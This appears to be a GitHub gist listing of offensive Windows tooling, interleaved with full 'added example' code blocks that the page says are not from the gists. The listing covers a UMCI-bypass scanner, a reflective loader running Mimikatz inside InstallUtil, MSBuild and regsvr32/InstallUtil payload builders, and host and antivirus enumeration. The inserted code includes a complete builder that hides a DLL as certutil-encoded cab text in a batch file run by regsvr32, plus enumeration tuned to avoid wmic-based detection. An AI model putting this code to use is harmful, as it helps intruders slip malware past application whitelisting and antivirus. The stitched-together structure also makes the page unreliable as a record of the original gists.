Chris Ross xorrior

@xorrior
xorrior / LoadMethodScanner.ps1
Created Aug 11, 2017 — forked from mattifestation/LoadMethodScanner.ps1
A crude Load(byte[]) method scanner for UMCI bypass research
View LoadMethodScanner.ps1
# Author: Matthew Graeber (@mattifestation)
# Load dnlib with Add-Type first
# dnlib can be obtained here: https://github.com/0xd4d/dnlib
# Example: ls C:\ -Recurse | Get-AssemblyLoadReference
filter Get-AssemblyLoadReference {
param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('FullName')]
[String]
[ValidateNotNullOrEmpty()]
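The gist preview above is cut off after the parameter block. The following is an added example (my own code, not the forked gist) of a stand-alone dnlib-based scanner for the same purpose: it walks the IL of every method in a managed assembly and reports call sites of System.Reflection.Assembly::Load(System.Byte[]). The dnlib.dll path, the function name and the scan root in the usage line are assumptions.

```powershell
# Added example, not Matt Graeber's gist. Requires a dnlib build; the path
# below is an assumption, adjust it to where dnlib.dll actually lives.
Add-Type -Path 'C:\Tools\dnlib.dll'

function Find-AssemblyLoadByteArrayCall {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $True)]
        [Alias('FullName')]
        [ValidateNotNullOrEmpty()]
        [string] $Path
    )

    process {
        # Only PE files are worth handing to dnlib.
        if ($Path -notmatch '\.(exe|dll)$') { return }

        try {
            # ModuleDefMD.Load throws (BadImageFormatException) for native PEs
            # and non-PE files; skip those silently.
            $module = [dnlib.DotNet.ModuleDefMD]::Load($Path)
        } catch {
            return
        }

        try {
            foreach ($type in $module.GetTypes()) {
                foreach ($method in $type.Methods) {
                    if (-not $method.HasBody) { continue }
                    foreach ($ins in $method.Body.Instructions) {
                        $code = $ins.OpCode.Code
                        if ($code -ne [dnlib.DotNet.Emit.Code]::Call -and
                            $code -ne [dnlib.DotNet.Emit.Code]::Callvirt) { continue }

                        # For call/callvirt the operand is an IMethod whose FullName
                        # carries return type, declaring type and parameter list.
                        $target = $ins.Operand.FullName
                        if ($target -eq 'System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])') {
                            [PSCustomObject]@{
                                Assembly = $Path
                                Method   = $method.FullName
                                Offset   = '0x{0:X4}' -f $ins.Offset
                            }
                        }
                    }
                }
            }
        } finally {
            $module.Dispose()
        }
    }
}

# Usage (scan root is a placeholder). Pipe hits through Get-AuthenticodeSignature
# on the Assembly property to see which ones are signed binaries a code-integrity
# policy would already trust.
# Get-ChildItem 'C:\Windows\Microsoft.NET' -Recurse -File | Find-AssemblyLoadByteArrayCall
```

The interesting hits for UMCI research are the signed, policy-trusted assemblies: a host that is allowed to run and then calls Load(byte[]) on attacker-controlled bytes is the bypass primitive being hunted for, so check each hit's Authenticode status before spending time on it. The scan is deliberately crude, as the gist title says: it only matches direct call sites, so a call reached through a delegate, reflection (MethodInfo.Invoke) or a different Load overload is not reported.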
@xorrior
xorrior / PELoader.cs
Created Jul 12, 2017
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
View PELoader.cs
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@xorrior
xorrior / pshell_template_embedded_script.xml
Created Dec 20, 2016
MSBuild Powershell Script XML template
View pshell_template_embedded_script.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<PropertyGroup>
<FunctionName Condition="'$(FunctionName)' == ''">None</FunctionName>
<Cmd Condition="'$(Cmd)' == ''">None</Cmd>
</PropertyGroup>
<Target Name="Hello">
@xorrior
xorrior / New-CplBatchFile.ps1
Last active Sep 20, 2017
Generate Batch file for cpl file
View New-CplBatchFile.ps1
function New-CplBatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
@xorrior
xorrior / New-RegSvr32BatchFile.ps1
Created Oct 28, 2016
Generate a batch file to execute a dll with regsvr32
View New-RegSvr32BatchFile.ps1
function New-RegSvr32BatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
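Both New-CplBatchFile and New-RegSvr32BatchFile describe the same delivery chain: cab-compress a DLL, certutil -encode the cab into text, and emit a batch file that decodes, expands and regsvr32-loads it. The following added example (my own code, not either gist) builds such a batch file with only built-in Windows tools. The function name, file names and output paths are assumptions.

```powershell
# Added example, not the gist's code. makecab compresses the DLL into a cab,
# certutil -encode wraps the cab in a base64 blob that travels as plain text,
# and the generated .bat reverses both steps before calling regsvr32.
function New-CabEncodedBatchFile {
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $true)] [string] $DllPath,
        [Parameter(Mandatory = $true)] [string] $OutFile
    )

    $cab = [IO.Path]::ChangeExtension($OutFile, '.cab')
    $b64 = [IO.Path]::ChangeExtension($OutFile, '.txt')
    # certutil -encode refuses to overwrite an existing output file.
    Remove-Item $cab, $b64 -ErrorAction SilentlyContinue

    # The file keeps its base name inside the cab, so expand restores it as-is.
    & makecab.exe $DllPath $cab | Out-Null
    # Output is PEM-style: -----BEGIN CERTIFICATE----- / base64 / -----END CERTIFICATE-----
    & certutil.exe -encode $cab $b64 | Out-Null
    $encoded = Get-Content -Path $b64
    $dllName = Split-Path -Leaf $DllPath

    # Redirection goes BEFORE echo on purpose: "echo abc1>>file" makes cmd treat
    # "1>>" as a handle redirect and drops the trailing digit, which silently
    # corrupts any base64 line ending in a digit. ">>file echo abc1" does not.
    $lines = @(
        '@echo off',
        'set TMPB64=%TEMP%\b64.txt',
        'set TMPCAB=%TEMP%\pkg.cab',
        'if exist %TMPB64% del %TMPB64%'
    )
    $lines += $encoded | ForEach-Object { ">>%TMPB64% echo $_" }
    $lines += @(
        'certutil -decode %TMPB64% %TMPCAB%',   # base64 text -> cab
        'expand %TMPCAB% -F:* %TEMP%',          # cab -> original DLL
        "regsvr32 /s %TEMP%\$dllName",          # /s: call DllRegisterServer silently
        'del %TMPB64% %TMPCAB%'
    )
    Set-Content -Path $OutFile -Value $lines -Encoding Ascii

    # The batch file now carries everything; drop the intermediates.
    Remove-Item $cab, $b64
    Get-Item $OutFile
}

# Usage (paths are placeholders):
# New-CabEncodedBatchFile -DllPath C:\build\payload.dll -OutFile C:\out\run.bat
```

The same batch body works for the .cpl case because a Control Panel item is just a DLL exporting CPlApplet; swap the regsvr32 line for whatever loader the payload expects, as the gist's description says. On the defensive side, the chain leaves a recognisable trace: certutil -decode and expand spawned by cmd.exe from a user-writable path, followed by regsvr32 loading a DLL out of %TEMP%, is a sequence worth a detection rule on its own.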
@xorrior
xorrior / New-InstallUtilBatchFile.ps1
Created Oct 27, 2016
Generate InstallUtil payload within batch file for delivery
View New-InstallUtilBatchFile.ps1
function New-InstallUtilBatchFile
{
<##>
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:payload.exe payload.cs
[CmdletBinding()]
param
(
@xorrior
xorrior / wmic_cmds.txt
Last active Jan 20, 2021
Useful Wmic queries for host and domain enumeration
View wmic_cmds.txt
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
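The same host checks, as an added example (my own code, not part of the gist) run through the CIM cmdlets rather than wmic.exe, so the results come back as objects that can be filtered or exported. It covers the three queries shown above; the function name is an assumption and no remote host is assumed.

```powershell
# Added example, not the gist's text. Each query is labelled with the wmic
# command it replaces. Add -CimSession to the Get-CimInstance calls to run it
# against a remote host over WinRM.
function Get-HostEnumeration {
    [CmdletBinding()]
    param ()

    # wmic os LIST Full   -> Win32_OperatingSystem (Caption holds the OS name)
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    # wmic computersystem LIST full -> Win32_ComputerSystem
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem

    # wmic /namespace:\\root\securitycenter2 path antivirusproduct
    # root\SecurityCenter2 exists only on client SKUs; on Server it is absent,
    # so treat a failure as "not available" rather than as a hard error.
    $av = $null
    try {
        $av = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction Stop
    } catch { }

    if ($av) {
        # productState is a packed status word; report it in hex for later decoding.
        $avText = ($av | ForEach-Object { '{0} (productState 0x{1:X6})' -f $_.displayName, $_.productState }) -join '; '
    } else {
        $avText = 'root\SecurityCenter2 not available'
    }

    [PSCustomObject]@{
        Hostname     = $cs.Name
        Domain       = $cs.Domain
        PartOfDomain = $cs.PartOfDomain
        OSName       = $os.Caption
        OSVersion    = $os.Version
        Architecture = $os.OSArchitecture
        LastBoot     = $os.LastBootUpTime
        AntiVirus    = $avText
    }
}

Get-HostEnumeration | Format-List
```

wmic.exe is deprecated and is not installed by default on recent Windows 11 builds, so the CIM form is the one that keeps working; it also avoids the very visible wmic.exe process creation that many detection rules key on, though the WMI queries themselves are still logged where WMI activity tracing is enabled.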
View keybase.md

Keybase proof

I hereby claim:

  • I am xorrior on github.
  • I am xorrior (https://keybase.io/xorrior) on keybase.
  • I have a public key whose fingerprint is A086 24A4 D702 0EAE FCEC 139D 56BA 7C93 A848 D2F7

To claim this, I am signing this object:
